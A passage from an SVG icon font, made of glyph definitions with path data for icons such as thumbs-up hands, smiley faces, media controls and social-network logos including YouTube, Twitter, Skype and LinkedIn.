<glyph unicode="&#xe71c;" d="M494.592 73.412c0-8.313-6.747-15.059-15.059-15.059h-25.75c-6.837 0-24.154-6.295-39.424-11.866-23.522-8.553-50.176-18.252-70.355-18.252h-95.924c-25.51 0-46.261 20.48-46.261 45.659 0 4.909 0.783 9.577 2.259 13.945h-4.066c-25.51 0-46.261 20.36-46.261 45.357 0 5.331 0.934 10.421 2.68 15.18-23.944 1.656-42.888 21.203-42.888 45.026 0 5.452 0.964 10.692 2.74 15.601h-70.053c-25.509 0-46.23 20.329-46.23 45.297 0 24.997 20.721 45.357 46.23 45.357h147.486l-8.012 7.379c-8.915 8.885-31.412 31.322-14.095 60.175 12.74 21.384 40.96 28.763 62.886 16.475l211.667-97.942c8.072-4.488 14.185-10.481 18.281-17.559h15.059c8.313 0 15.059-6.747 15.059-15.059s-6.747-15.059-15.059-15.059h-25.028c-6.897 0-12.921 4.668-14.607 11.385-1.024 4.006-3.644 7.379-7.379 9.487l-211.667 97.913c-8.855 4.94-18.884 2.409-23.341-5.090-2.59-4.337-5.24-8.734 9.036-23.010l36.020-33.069c4.578-4.216 6.084-10.752 3.825-16.565s-7.831-9.577-14.035-9.577h-186.127c-8.855 0-16.083-6.837-16.083-15.239 0-8.373 7.228-15.179 16.113-15.179h109.357c7.951 0 14.517-6.144 15.029-14.095 0.512-7.921-5.21-14.878-13.071-15.902-7.8-0.994-13.884-7.921-13.884-15.721 0-8.283 7.228-15.059 16.113-15.059h38.189c8.132 0 14.818-6.476 15.059-14.577 0.241-8.162-6.024-14.998-14.125-15.51-8.433-0.542-15.029-7.138-15.029-15.089 0-8.403 7.258-15.24 16.143-15.24h47.044c8.222 0 14.908-6.596 15.059-14.788s-6.325-15.029-14.517-15.33c-7.77-0.271-15.661-5.15-15.661-13.945 0-8.403 7.409-15.51 16.143-15.51h95.924c14.878 0 38.882 8.734 60.055 16.444 20.962 7.65 37.556 13.673 49.694 13.673h25.75c8.342 0 15.089-6.747 15.089-15.059z" />
<glyph unicode="&#xe71d;" d="M414.208 139.58c-28.793-17.378-51.26 5.211-59.693 13.673l-7.83 8.493v-147.516c0-25.51-20.329-46.231-45.327-46.231s-45.327 20.721-45.327 46.231v70.024c-4.879-1.777-10.119-2.74-15.571-2.74-23.793 0-43.369 18.944-45.056 42.887-4.758-1.777-9.879-2.711-15.209-2.711-24.998 0-45.327 20.751-45.327 46.291v4.096c-4.367-1.476-9.035-2.259-13.945-2.259-25.148 0-45.628 20.751-45.628 46.231v95.955c0 20.179 9.698 46.833 18.252 70.325 5.572 15.269 11.867 32.587 11.867 39.424v25.781c0 8.313 6.746 15.059 15.059 15.059s15.059-6.747 15.059-15.059v-25.75c0-12.168-6.024-28.762-13.674-49.755-7.71-21.173-16.444-45.147-16.444-60.024v-95.955c0-8.734 7.108-16.113 15.54-16.113 8.794 0 13.674 7.891 13.944 15.661 0.301 8.132 6.957 14.517 15.059 14.517 0.090 0 0.18 0 0.271 0 8.192-0.15 14.788-6.867 14.788-15.059v-47.044c0-8.915 6.837-16.173 15.209-16.173 7.951 0 14.577 6.626 15.119 15.059 0.482 8.101 7.077 14.156 15.481 14.095 8.132-0.271 14.577-6.927 14.577-15.059v-38.189c0-8.885 6.776-16.113 15.059-16.113 7.8 0 14.667 6.084 15.691 13.884 1.024 7.861 8.041 13.974 15.902 13.101 7.921-0.512 14.095-7.077 14.095-15.029v-109.357c0-8.885 6.837-16.113 15.209-16.113s15.209 7.228 15.209 16.113v186.127c0 6.204 3.795 11.776 9.577 14.035 5.692 2.259 12.318 0.723 16.565-3.825l33.551-36.473c13.824-13.914 18.281-11.234 22.528-8.644 7.409 4.397 9.969 14.577 5.662 22.287l-99.027 213.775c-1.596 2.74-4.94 5.361-8.945 6.355-6.686 1.687-11.385 7.68-11.385 14.607v25.058c0 8.313 6.747 15.059 15.059 15.059s15.059-6.746 15.059-15.059v-15.029c7.017-4.036 12.89-9.939 16.986-17.288l99.027-213.775c11.836-20.901 4.457-49.122-17.017-61.861z" />
<glyph unicode="&#xe71e;" d="M391.529 178.824v301.176h-391.529v-391.529h391.529v90.353zM30.117 449.882h331.294v-240.941h-22.739l-77.221 99.961-34.906-36.563-67.704 116.887-107.701-180.284h-21.022v240.941zM300.635 208.941h-214.407l72.222 120.892 62.163-107.339 38.4 40.267 41.623-53.82zM30.117 118.588v60.236h331.294v-60.236h-331.294zM512 389.647v-391.529h-391.529v59.753h30.118v-29.636h331.294v331.294h-60.236v30.118h90.353z" />
<glyph unicode="&#xe71f;" d="M256 480c-141.161 0-256-114.839-256-256s114.838-256 256-256 256 114.839 256 256-114.839 256-256 256zM256-1.882c-124.567 0-225.882 101.316-225.882 225.882s101.316 225.882 225.882 225.882 225.882-101.316 225.882-225.882-101.316-225.882-225.882-225.882zM391.529 208.941c0-74.722-60.808-135.53-135.53-135.53s-135.53 60.808-135.53 135.529c0 8.313 6.746 15.059 15.059 15.059s15.059-6.747 15.059-15.059c0-58.127 47.285-105.412 105.412-105.412s105.412 47.284 105.412 105.412c0 8.313 6.747 15.059 15.059 15.059s15.059-6.747 15.059-15.059zM135.53 314.353c0 16.625 13.493 30.118 30.118 30.118s30.118-13.493 30.118-30.118-13.493-30.118-30.118-30.118-30.118 13.493-30.118 30.118zM316.236 314.353c0 16.625 13.493 30.118 30.118 30.118s30.118-13.493 30.118-30.118-13.493-30.118-30.118-30.118-30.118 13.493-30.118 30.118z" />
<glyph unicode="&#xe720;" d="M256 480c-141.161 0-256-114.839-256-256s114.838-256 256-256 256 114.839 256 256-114.839 256-256 256zM256-1.882c-124.567 0-225.882 101.316-225.882 225.882s101.316 225.882 225.882 225.882 225.882-101.316 225.882-225.882-101.316-225.882-225.882-225.882zM391.529 88.471c0-8.313-6.747-15.059-15.059-15.059s-15.059 6.747-15.059 15.059c0 58.127-47.284 105.412-105.412 105.412s-105.412-47.284-105.412-105.412c0-8.313-6.746-15.059-15.059-15.059s-15.059 6.747-15.059 15.059c0 74.722 60.808 135.53 135.53 135.53s135.53-60.807 135.53-135.53zM135.53 314.353c0 16.625 13.493 30.118 30.118 30.118s30.118-13.493 30.118-30.118-13.493-30.118-30.118-30.118-30.118 13.493-30.118 30.118zM316.236 314.353c0 16.625 13.493 30.118 30.118 30.118s30.118-13.493 30.118-30.118-13.493-30.118-30.118-30.118-30.118 13.493-30.118 30.118z" />
<glyph unicode="&#xe721;" d="M466.824 419.764h-421.647c-24.907 0-45.176-20.269-45.176-45.177v-301.176c0-24.908 20.269-45.176 45.176-45.176h421.647c24.907 0 45.176 20.269 45.176 45.176v301.176c0 24.907-20.269 45.176-45.176 45.176zM481.882 73.412c0-8.283-6.747-15.059-15.059-15.059h-421.647c-8.313 0-15.059 6.776-15.059 15.059v165.647h451.764v-165.647zM30.117 329.412v45.176c0 8.282 6.746 15.059 15.059 15.059h421.647c8.313 0 15.059-6.777 15.059-15.059v-45.176h-451.764z" />
<glyph unicode="&#xe722;" d="M90.353 41.156l219.286 183.627-219.286 181.851v-365.478zM120.471 342.543l142.125-117.88-142.125-118.995v236.875zM421.647 419.764v-391.529h-30.118v391.529h30.118z" />
<glyph unicode="&#xe723;" d="M202.361 223.217l219.286-181.851v365.478l-219.286-183.627zM391.529 105.457l-142.125 117.88 142.125 118.995v-236.875zM90.353 419.764h30.117v-391.529h-30.118v391.529z" />
<glyph unicode="&#xe724;" d="M256 404.706c-99.659 0-180.706-81.047-180.706-180.706s81.047-180.706 180.706-180.706 180.706 81.046 180.706 180.706-81.046 180.706-180.706 180.706zM256 73.412c-83.034 0-150.588 67.554-150.588 150.588s67.554 150.588 150.588 150.588 150.588-67.554 150.588-150.588-67.554-150.588-150.588-150.588z" />
<glyph unicode="&#xe725;" d="M255.217 398.11l-181.851-219.286h365.478l-183.627 219.286zM255.338 351.067l118.995-142.125h-236.875l117.88 142.125zM451.764 88.471v-30.118h-391.529v30.118h391.529z" />
<glyph unicode="&#xe726;" d="M391.529 239.059h30.118c0-74.722-60.808-135.53-135.53-135.53s-135.53 60.808-135.53 135.53h30.118c0-58.127 47.285-105.412 105.412-105.412s105.412 47.284 105.412 105.412zM225.882 284.236c16.655 0 30.118 13.462 30.118 30.118s-13.463 30.118-30.118 30.118-30.118-13.462-30.118-30.118 13.463-30.118 30.118-30.118zM346.353 284.236c16.655 0 30.118 13.462 30.118 30.118s-13.462 30.118-30.118 30.118-30.118-13.462-30.118-30.118 13.462-30.118 30.118-30.118zM512 254.118c0-124.567-101.316-225.882-225.882-225.882-40.358 0-79.751 10.812-114.537 31.353l-165.647-85.625 85.624 165.617c-20.51 34.786-31.323 74.18-31.323 114.537 0 124.566 101.316 225.882 225.882 225.882s225.882-101.316 225.882-225.882zM481.882 254.118c0 107.942-87.823 195.764-195.764 195.764s-195.764-87.823-195.764-195.764c0-37.466 10.782-74.060 31.202-105.743l4.728-7.318-50.116-96.918 96.888 50.116 7.319-4.728c31.714-20.389 68.246-31.172 105.743-31.172 107.942 0 195.764 87.823 195.764 195.764z" />
<glyph unicode="&#xe727;" d="M512 253.184c0 24.907-20.269 45.177-45.176 45.177h-144.805l8.584 27.528 0.692 108.935c0 24.907-20.269 45.176-45.176 45.176h-60.236c-24.907 0-45.177-20.269-45.177-45.176v-103.966l9.337-32.527h-144.866c-24.907 0-45.176-20.269-45.176-45.177v-104.99h28.070l-23.070-180.164h502.001l-23.070 180.164h28.070v105.020zM472.787-1.882h-51.14v60.236h-30.118v-60.236h-30.118v90.353h-30.118v-90.353h-30.118v120.471h-30.118v-120.471h-150.588v60.236h-30.118v-60.236h-51.14l19.215 150.046h395.144l19.215-150.046zM31.924 178.281h-1.807v74.903c0 8.312 6.746 15.059 15.059 15.059h185.675l-20.028 64.904v101.677c0 8.313 6.746 15.059 15.059 15.059h60.236c8.313 0 15.059-6.746 15.059-15.059v-102.189l-20.089-64.392h185.736c8.313 0 15.059-6.747 15.059-15.059v-74.872h-449.957zM240.941 419.764h30.117v-30.118h-30.118v30.118z" />
<glyph unicode="&#xe728;" d="M250.006 286.584c13.162 0 23.16 4.849 30.299 14.577 5.452 7.138 7.981 18.583 7.981 33.732v49.995c0 15.149-2.53 26.292-7.981 33.43-7.168 9.668-17.167 14.547-30.298 14.547-12.891 0-22.889-4.849-29.967-14.547-5.452-7.168-8.012-18.312-8.012-33.461v-49.995c0-15.149 2.56-26.292 8.012-33.732 7.077-9.698 17.077-14.547 29.967-14.547zM237.719 390.009c0 13.131 4.006 19.697 12.288 19.697 8.584 0 12.288-6.566 12.288-19.697v-59.995c0-13.161-3.704-19.998-12.288-19.998-8.282 0-12.288 6.867-12.288 19.998v59.995zM311.717 297.156c-1.445 4.307-2.259 11.143-2.259 21.413v112.58h25.991v-104.839c0-6.024 0-9.427 0.301-10.029 0.572-4.006 2.56-6.264 5.993-6.264 5.12 0 10.541 4.006 16.264 12.288v108.845h25.991v-142.577h-25.991v15.721c-10.27-11.987-19.968-17.709-29.455-17.709-8.283 0-14.276 3.404-16.836 10.571zM410.594 124.281v-13.132h-25.721v13.132c0 12.86 4.307 19.456 12.86 19.456 8.553-0.030 12.86-6.596 12.86-19.456zM131.132 426.572c-6.264 17.709-12.529 35.719-18.582 53.428h30.329l20.269-75.144 19.426 75.144h29.154l-34.575-113.995v-77.433h-28.552v77.433c-2.59 14.005-8.313 34.003-17.468 60.567zM460.288 215.416c-5.15 22.588-23.733 39.153-45.719 41.713-52.586 5.722-105.743 5.722-158.6 5.722s-106.014 0-158.298-5.722c-22.227-2.56-40.538-19.125-45.959-41.713-7.138-31.985-7.439-66.861-7.439-99.99 0-32.858 0-67.976 7.439-99.99 5.15-22.588 23.732-39.153 45.718-41.442 52.556-5.993 105.713-5.993 158.57-5.993s106.014 0 158.6 5.993c21.956 2.289 40.267 18.853 45.719 41.442 7.138 31.985 7.439 67.132 7.439 99.99-0.030 33.13-0.030 68.005-7.469 99.99zM165.135 186.564h-30.54v-162.575h-28.582v162.575h-30.028v26.865h89.148v-26.865zM242.297 23.988h-25.45v15.42c-10.3-11.716-19.998-17.438-29.154-17.438-8.252 0-14.276 3.433-16.565 10.572-1.446 4.276-2.289 10.873-2.289 20.841v111.707h25.45v-103.996c0-6.024 0-9.156 0.271-10.029 0.602-3.976 2.59-5.993 5.994-5.993 5.18 0 10.601 3.976 16.293 11.987v108.002h25.45v-141.071zM339.456 66.274c0-13.161-0.603-22.558-2.59-28.551-3.132-10.3-10.3-15.721-20.3-15.721-9.125 0-18.010 5.15-26.594 15.721v-13.733h-25.389v189.44h25.389v-62.012c8.283 10.3 17.167 15.42 26.594 15.42 9.999 0 17.167-5.421 20.3-15.993 1.988-5.723 2.59-15.119 2.59-28.281v-56.29zM436.013 89.705h-51.14v-24.847c0-13.161 4.307-19.697 13.161-19.697 6.295 0 9.999 3.404 11.445 10.27 0.271 1.416 0.572 7.138 0.572 17.438h25.991v-3.735c0-8.283 0-14.005-0.572-16.565-0.603-5.692-2.892-10.842-5.993-15.42-6.897-9.999-17.438-15.149-30.841-15.149-13.433 0-23.462 4.849-30.87 14.577-5.421 6.867-8.283 18.010-8.283 33.159v49.423c0 15.149 2.59 25.991 8.012 33.159 7.439 9.728 17.438 14.577 30.599 14.577 12.89 0 22.86-4.849 30.268-14.577 5.18-7.138 7.74-17.98 7.74-33.159v-29.455zM314.007 124.582v-60.296c0-12.86-3.735-19.125-11.144-19.125-4.307 0-8.584 1.988-12.89 6.264v85.986c4.307 4.307 8.584 6.295 12.89 6.295 7.409 0 11.144-6.565 11.144-19.125z" />
<glyph unicode="&#xe729;" d="M471.763 398.983c-12.529 15.902-34.033 24.335-62.132 24.335-7.951 0-15.692-0.693-22.829-1.777-26.172-4.397-90.925-37.105-112.82-105.954-1.536-4.758-0.572-9.999 2.56-13.944 3.132-3.916 8.101-6.054 13.041-5.632 16.926 1.356 29.575 0.362 33.491-4.005 3.132-3.404 4.276-11.625 3.192-23.13-1.385-15.36-10.029-33.1-19.094-50.447-4.367-7.951-17.709-32.377-25.962-32.377-1.957 0-5.090 2.078-8.313 5.541-15.481 16.716-18.673 48.58-21.413 76.74-0.964 9.276-1.837 18.131-3.132 26.504l-2.078 11.776c-2.861 16.565-6.114 35.328-11.264 52.074-6.204 19.396-21.052 44.394-42.797 51.14-4.698 1.325-9.819 1.988-15.149 1.988-20.721 0-39.334-9.909-44.604-12.981-22.076-13.101-39.936-29.154-57.224-44.694-13.041-11.686-26.504-23.823-41.743-34.575-3.976-2.831-6.355-10.089-6.355-14.969 0-5.692 3.192-10.902 8.313-13.463 1.687-0.873 1.928-1.265 3.283-3.915 2.169-4.216 6.656-12.921 19.276-14.939 11.173-1.656 21.655 1.627 30.358 4.367 4.728 1.506 9.216 2.891 12.138 2.891 1.054 0 2.289 0 4.788-4.186 5.21-8.704 8.072-18.643 11.084-29.184 1.566-5.361 3.102-10.722 4.999-16.263 6.686-18.402 11.806-38.49 17.197-59.753l4.728-18.884c10.782-44.423 25.57-105.201 66.831-122.519 6.234-2.651 13.342-4.005 21.173-4.005 20.149 0 41.472 8.854 53.308 16.264 35.117 20.691 67.493 51.26 98.906 93.485 57.555 77.041 93.004 169.863 99.178 202.451 4.909 26.082 1.356 46.381-10.933 62.042zM453.12 342.543c-4.397-23.13-34.726-111.074-93.726-190.012-29.003-39.002-58.428-66.981-90.383-85.805-11.866-7.409-35.75-15.089-47.104-10.27-27.316 11.475-40.026 63.729-49.303 101.918l-4.849 19.245c-5.572 21.956-10.873 42.737-17.95 62.344-1.686 4.819-3.072 9.698-4.488 14.517-3.404 11.897-6.957 24.214-14.185 36.262-7.409 12.529-17.709 18.884-30.63 18.884-7.559 0-14.457-2.168-21.142-4.276-4.788-1.506-9.337-2.922-14.427-3.222-0.391 0.692-0.813 1.506-1.325 2.349 11.385 8.975 21.684 18.221 31.744 27.287 16.926 15.239 32.918 29.606 52.345 41.111 6.988 4.066 18.853 8.824 29.364 8.824 2.59 0 4.94-0.301 6.626-0.753 7.71-2.379 17.86-16.474 22.588-31.262 4.548-14.757 7.62-32.527 10.3-48.219l2.078-11.656c1.174-7.439 1.958-15.751 2.861-24.455 3.222-32.888 6.927-70.114 29.364-94.298 9.396-10.029 19.607-15.119 30.359-15.119 26.142 0 41.954 28.973 53.73 50.597 9.366 17.98 19.456 38.882 21.324 59.633 1.928 21.203-1.536 35.84-10.933 46.17-9.457 10.391-22.92 13.372-34.274 14.186 24.335 46.351 71.168 63.699 80.444 65.265 5.541 0.813 11.746 1.385 18.131 1.385 10.632 0 29.696-1.687 38.46-12.83 6.565-8.403 8.192-20.751 5-37.798z" />
<glyph unicode="&#xe72a;" d="M512 382.539c-18.853-8.132-39.303-13.974-60.446-16.233 21.775 12.981 38.34 33.43 46.14 57.796-20.149-12.017-42.887-20.781-66.59-25.329-19.155 20.48-46.442 33.13-76.649 33.13-58.157 0-104.93-47.104-104.93-104.9 0-8.132 0.994-16.263 2.59-24.064-87.070 4.518-164.714 46.11-216.365 109.809-9.096-15.571-14.306-33.46-14.306-52.977 0-36.382 18.523-68.517 46.772-87.371-17.197 0.663-33.461 5.542-47.435 13.312 0-0.301 0-0.964 0-1.295 0-50.959 36.051-93.214 84.148-102.972-8.764-2.259-18.191-3.554-27.618-3.554-6.806 0-13.312 0.632-19.788 1.627 13.312-41.592 51.983-71.8 98.093-72.794-36.081-28.25-81.228-44.815-130.289-44.815-8.764 0-16.896 0.301-25.329 1.265 46.471-29.877 101.677-47.104 161.16-47.104 192.964 0 298.556 159.834 298.556 298.526 0 4.578 0 9.095-0.301 13.673 20.42 14.939 38.279 33.491 52.586 54.272zM429.568 314.624c0-111.466-83.275-268.409-268.438-268.409-14.818 0-29.485 1.204-43.911 3.554 20.179 8.313 39.303 19.456 56.952 33.25 10.029 7.83 14.035 21.142 9.999 33.22-4.036 12.077-15.209 20.329-27.949 20.601-16.414 0.332-31.774 5.933-44.183 15.33 0.121 0.030 0.241 0.060 0.362 0.091 13.613 3.493 22.98 15.902 22.619 29.937-0.332 14.065-10.331 25.962-24.094 28.762-19.636 3.976-36.231 15.541-46.953 31.503 1.054-0.060 2.078-0.12 3.132-0.15 0.391 0 0.753 0 1.144 0 13.011 0 24.606 8.373 28.642 20.841 4.156 12.83-0.723 26.835-11.957 34.334-18.974 12.649-31.021 33.009-33.069 55.446 54.934-47.646 124.868-76.228 198.686-80.052 0.512-0.030 1.054-0.030 1.566-0.030 8.764 0 17.107 3.825 22.86 10.511 6.084 7.077 8.524 16.595 6.626 25.72-1.325 6.295-1.988 12.348-1.988 17.92 0 41.231 33.551 74.782 74.812 74.782 21.022 0 40.418-8.373 54.663-23.612 3.493-3.735 7.861-6.476 12.559-8.012-0.572-4.397-0.18-8.945 1.295-13.372 1.897-5.752 5.421-10.601 9.939-14.156-2.68-4.939-3.976-10.631-3.584-16.384 0.301-3.885 0.271-7.74 0.271-11.625z" />
<glyph unicode="&#xe72b;" d="M261 480c-141.161 0-256-114.839-256-256s114.838-256 256-256 256 114.839 256 256c0 141.161-114.839 256-256 256zM261-1.882c-124.567 0-225.882 101.316-225.882 225.882s101.316 225.882 225.882 225.882 225.882-101.316 225.882-225.882-101.316-225.882-225.882-225.882zM421.647 208.941v-30.118h-180.706v150.588h30.117v-120.47h150.588z" />
<glyph unicode="&#xe72c;" d="M396.047 97.897c-21.685-14.396-42.767-21.384-64.482-21.384-11.173 0-20.601 2.469-28.913 7.56-5.12 3.102-8.342 6.716-10.029 11.354-1.566 4.036-3.404 15.721-3.404 48.55v108.574h114.236v105.713h-114.206v121.736h-97.009l-1.686-13.192c-2.892-22.829-8.132-41.894-15.42-56.561-7.379-14.486-16.775-26.503-28.552-36.653-11.987-9.999-26.715-17.95-43.701-23.582l-10.331-3.434v-94.027h53.339v-154.052c0-24.456 2.62-42.858 7.891-55.838 5.15-13.644 14.908-26.774 29.184-39.123 13.975-11.806 30.268-20.691 48.219-26.323 18.402-6.084 39.635-9.216 63.097-9.216 21.052 0 40.538 2.139 57.645 6.325 17.288 3.945 36.563 10.963 58.88 21.474l8.644 4.066v113.574l-23.401-15.541zM389.331 19.079c-16.655-7.379-31.172-12.438-44.333-15.481-31.232-7.62-74.572-7.71-104.599 2.259-14.336 4.517-27.136 11.475-37.918 20.57-10.27 8.915-17.197 17.95-20.691 27.196-3.885 9.517-5.813 24.606-5.813 44.845v184.2h-53.308v42.496c16.354 6.505 30.87 14.998 43.369 25.449 14.757 12.71 26.865 28.19 35.96 46.080 7.5 14.998 12.951 32.467 16.475 53.188h40.659v-121.736h114.236v-45.477h-114.236v-138.662c0-32.166 1.566-49.393 5.3-59.060 3.945-10.933 11.565-19.877 22.588-26.564 27.98-17.197 67.012-15.119 102.31 1.265v-40.568z" />
<glyph unicode="&#xe72d;" d="M487.876 180.54c2.68 14.757 4.036 29.365 4.036 43.46 0 144.203-128.572 259.253-279.401 231.876-22.769 15.812-49.243 24.124-76.981 24.124-74.722 0-135.53-60.808-135.53-135.53 0-27.738 8.313-54.212 24.124-77.011-2.68-14.758-4.036-29.335-4.036-43.46 0-144.203 128.602-259.252 279.401-231.876 22.769-15.812 49.243-24.124 76.981-24.124 74.722 0 135.53 60.808 135.53 135.529 0 27.738-8.313 54.212-24.124 77.011zM376.471-1.882c-23.341 0-45.538 7.589-64.241 21.956l-5.481 4.216-6.776-1.416c-15.029-3.102-29.817-4.668-44.002-4.668-113.483 0-205.794 92.31-205.794 205.794 0 14.185 1.566 28.973 4.699 44.002l1.386 6.776-4.216 5.482c-14.336 18.643-21.925 40.9-21.925 64.211 0 58.127 47.285 105.412 105.412 105.412 23.341 0 45.538-7.589 64.241-21.956l5.482-4.216 6.776 1.416c14.999 3.072 29.786 4.668 43.972 4.668 113.483 0 205.794-92.311 205.794-205.794 0-14.185-1.566-28.973-4.699-44.002l-1.385-6.776 4.216-5.481c14.366-18.643 21.956-40.9 21.956-64.211 0-58.127-47.284-105.412-105.412-105.412zM383.067 171.625c0-63.699-61.5-93.184-120.471-93.184-70.596 0-129.596 31.382-129.596 69.964 0 17.228 9.728 32.918 31.714 32.918 33.581 0 36.714-48.308 94.75-48.308 27.588 0 45.478 12.197 45.478 28.22 0 20.089-17.257 23.221-45.176 30.118l-45.809 11.294c-45.779 10.993-80.956 29.816-80.956 82.522 0 63.668 63.066 87.221 117.339 87.221 59.301 0 119.206-23.522 119.206-59.603 0-18.191-12.228-34.214-32.618-34.214-30.449 0-31.382 36.051-80.655 36.051-27.588 0-45.177-7.5-45.177-24.124 0-18.221 17.89-22.287 41.773-27.949l32.587-7.529c44.574-10.029 97.611-28.822 97.611-83.396z" />
<glyph unicode="&#xe72e;" d="M204.649 76.544c-33.43 31.232-52.615 75.355-52.615 121.103 0 91.347 74.331 165.647 165.647 165.647h87.702l-79.692 79.692 21.293 21.293 116.074-116.074-116.073-116.073-21.293 21.293 79.692 79.691h-87.702c-74.722 0-135.53-60.808-135.53-135.529 0-37.978 15.3-73.156 43.038-99.087l-20.54-21.956zM483.328 208.038v-194.861c0-8.283-6.776-15.059-15.059-15.059h-421.647c-8.282 0-15.059 6.776-15.059 15.059v195.012h-30.117v-195.012c0-24.908 20.269-45.176 45.176-45.176h421.647c24.907 0 45.176 20.269 45.176 45.176v194.861h-30.118z" />
<glyph unicode="&#xe72f;" d="M166.46 232.162l-116.043 116.073 116.073 116.073 21.293-21.293-79.722-79.722h87.703c91.317 0 165.647-74.3 165.647-165.647 0-45.748-19.185-89.841-52.615-121.103l-20.54 21.986c27.738 25.962 43.038 61.139 43.038 99.117 0 74.722-60.808 135.529-135.53 135.529h-87.703l79.692-79.691-21.293-21.323zM481.882 208.188v-195.012c0-8.283-6.776-15.059-15.059-15.059h-421.647c-8.282 0-15.059 6.776-15.059 15.059v194.861h-30.117v-194.861c0-24.907 20.269-45.176 45.176-45.176h421.647c24.908 0 45.176 20.269 45.176 45.176v195.012h-30.118z" />
<glyph unicode="&#xe730;" d="M361.412 148.706c0 30.118 0 150.588 0 180.706 0 150.588-90.353 150.588-90.353 150.588s-90.353 0-90.353-150.588 0-60.236 0-180.706c0 0-60.236 0-60.236-180.706 0 0 71.65 71.529 129.868 87.19 0.12-17.529 9.337-31.654 20.721-31.654s20.601 14.156 20.721 31.654c58.217-15.661 129.868-87.19 129.868-87.19 0 180.706-60.236 180.706-60.236 180.706zM271.059 449.852c7.83-0.632 50.206-8.132 58.639-90.323h-117.278c8.433 82.191 50.808 89.691 58.639 90.323zM271.059 88.471c-38.279 0-82.582-26.142-116.766-51.712 7.921 63.88 25.871 79.18 29.907 81.829h26.624v210.824h120.471v-210.824h26.624c4.036-2.651 21.986-17.95 29.907-81.829-34.183 25.57-78.486 51.712-116.766 51.712z" />
<glyph unicode="&#xe731;" d="M452.517 292.518c0-115.019-63.94-200.644-157.997-200.644-31.594 0-61.29 17.107-71.228 36.533-17.107-67.404-20.54-80.324-20.54-80.324-6.114-22.468-18.643-44.966-29.666-62.464-31.412-22.197-34.334 12.168-34.334 12.168-0.723 20.601-0.362 45.327 5 67.373 0 0 5.692 23.642 37.647 159.172-9.487 18.673-9.487 46.471-9.487 46.471 0 43.4 25.148 75.776 56.38 75.776 26.654 0 39.575-20.179 39.575-44.183 0-26.654-17.167-66.65-25.871-103.575-7.228-31.232 15.601-56.35 46.050-56.35 55.627 0 92.883 71.168 92.883 155.347 0 64.362-43.37 112.309-121.826 112.309-88.697 0-143.902-66.259-143.902-140.108 0-25.54 7.59-43.429 19.396-57.524 5.361-6.476 6.114-8.734 4.186-16.354-1.476-5.331-4.518-18.281-6.054-23.221-1.898-7.62-8.011-10.27-14.457-7.62-40.749 16.805-59.813 61.711-59.813 111.978 0 83.004 70.024 182.754 208.655 182.754 111.947 0 185.404-81.077 185.404-167.514z" />
<glyph unicode="&#xe732;" d="M451.764 419.764v-225.882h-30.118v170.707l-281.118-281.118-21.293 21.293 284.883 284.883h-178.236v30.118h225.882zM331.294-1.882h-301.176v301.176h197.994v30.118h-228.111v-361.412h361.412v232.327h-30.118v-202.21z" />
<glyph unicode="&#xe733;" d="M232.93 6.46l279.070-38.46v241.845h-279.070v-203.385zM263.048 179.727h218.835v-177.182l-218.835 30.178v147.004zM0 38.445l209.829-28.883v200.283h-209.829v-171.399zM30.117 179.727h149.595v-135.62l-149.595 20.601v115.019zM0 235.685h209.829v202.752l-209.829-28.883v-173.869zM30.117 383.322l149.595 20.601v-138.089h-149.595v117.489zM232.93 441.54v-205.854h279.070v244.315l-279.070-38.46zM481.882 265.803h-218.835v149.474l218.835 30.178v-179.652z" />
<glyph unicode="&#xe734;" d="M512 359.529v-30.117h-361.412v30.117h361.412zM150.588 208.941h361.412v30.118h-361.412v-30.118zM150.588 88.471h361.412v30.118h-361.412v-30.118zM62.735 375.19h0.271v-71.77h10.722v82.131h-9.457l-17.95-9.608 2.139-8.463 14.276 7.71zM49.363 191.714l6.596 6.053c17.287 16.685 28.281 28.943 28.281 44.123 0 11.746-7.469 23.884-25.178 23.884-9.457 0-17.529-3.524-23.221-8.343l3.524-7.831c3.825 3.162 9.999 6.957 17.468 6.957 12.228 0 16.293-7.71 16.293-16.053-0.121-12.379-9.638-23.010-30.599-42.978l-8.704-8.463v-6.837h52.404v9.246h-36.864v0.241zM67.343 106.812v0.271c10.12 3.644 15.18 10.842 15.18 19.336 0 9.969-7.319 19.577-23.492 19.577-8.855 0-17.197-3.132-21.504-6.325l2.922-8.101c3.524 2.53 9.849 5.452 16.444 5.452 10.24 0 14.396-5.813 14.396-12.378 0-9.728-10.24-13.914-18.311-13.914h-6.204v-8.313h6.174c10.752 0 21.112-4.94 21.233-16.444 0.15-6.837-4.307-15.902-18.552-15.902-7.74 0-15.059 3.132-18.191 5.18l-3.042-8.584c4.036-2.68 12.108-5.602 21.353-5.602 19.697 0 29.937 11.505 29.937 24.636 0 11.505-8.222 19.094-18.341 21.113z" />
<glyph unicode="&#xe735;" d="M21.022 304.625h103.544v-310.904h-103.544v310.904zM73.427 454.279c-35.148 0-58.368-23.221-58.368-53.669 0-29.787 22.287-53.639 57.103-53.639h0.632c36.081 0 58.669 23.853 58.368 53.639-0.332 30.449-22.287 53.669-57.736 53.669zM378.036 311.853c-55.085 0-79.601-30.178-93.184-51.471v44.243h-103.213c0 0 1.265-29.184 0-310.904h103.213v173.508c0 9.397 0.964 18.522 3.433 25.389 7.56 18.522 24.456 37.647 53.067 37.647 37.286 0 52.344-28.551 52.344-70.264v-166.28h103.243v178.206c0 95.382-50.839 139.927-118.904 139.927z" />
<glyph unicode="&#xe736;" d="M512 480v-512h-120.471v512h120.471zM0-32h90.353v512h-90.353v-512zM331.294-32h30.118v30.118h-30.118v-30.118zM228.020-32h25.811v30.118h-25.811v-30.118zM279.673-32h25.811v30.118h-25.811v-30.118zM176.399-32h25.811v30.118h-25.811v-30.118zM120.471-32h30.117v30.118h-30.118v-30.118zM120.471 389.647h30.117v30.118h-30.118v-30.118zM120.471 88.471h30.117v30.118h-30.118v-30.118zM120.471 28.236h30.117v30.118h-30.118v-30.118zM120.471 148.706h30.117v30.118h-30.118v-30.118zM120.471 269.177h30.117v30.117h-30.118v-30.117zM120.471 329.412h30.117v30.117h-30.118v-30.117zM120.471 208.941h30.117v30.118h-30.118v-30.118zM120.471 449.882h30.117v30.118h-30.118v-30.118zM176.399 449.882h25.811v30.118h-25.811v-30.118zM279.673 449.882h25.811v30.118h-25.811v-30.118zM228.020 449.882h25.811v30.118h-25.811v-30.118zM331.294 449.882h30.118v30.118h-30.118v-30.118zM331.294 329.412h30.118v30.117h-30.118v-30.117zM331.294 389.647h30.118v30.118h-30.118v-30.118zM331.294 269.177h30.118v30.117h-30.118v-30.117zM331.294 208.941h30.118v30.118h-30.118v-30.118zM331.294 28.236h30.118v30.118h-30.118v-30.118zM331.294 